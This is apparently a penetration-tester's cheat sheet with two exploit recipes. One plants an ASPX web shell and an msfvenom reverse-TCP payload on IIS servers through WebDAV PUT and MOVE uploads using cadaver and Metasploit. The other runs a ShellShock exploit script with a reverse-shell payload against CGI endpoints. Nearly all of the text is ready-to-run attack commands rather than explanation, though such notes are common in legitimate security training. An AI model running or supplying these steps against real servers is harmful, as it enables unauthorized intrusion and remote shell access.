Exploits

WEBDAV - PUT+MOVE

Enumeration

davtest -url <url>

Exploit

use exploit/windows/iis/iis_webdav_upload_asp

cp /usr/share/webshells/aspx/cmdasp.aspx ./cmd.txt
msfvenom -p windows/shell/reverse_tcp lhost=<lhsot> lport=<lport> -f exe > payload.txt
cadaver <http://url/dav_directory>
>put cmd.txt
>move cmd.txt cmd.aspx
>put payload.txt
>move payload.txt payload.exe

<url>/cmd.aspx
..\..\..\Inetpub\wwwroot\payload.exe

ShellShock

• https://www.exploit-db.com/exploits/34900

python shellshock.py payload=reverse rhost=<rhost> lhost=<lhost> lport=<lport> pages=</cgi-bin/endpoint.cgi.sh.pl...>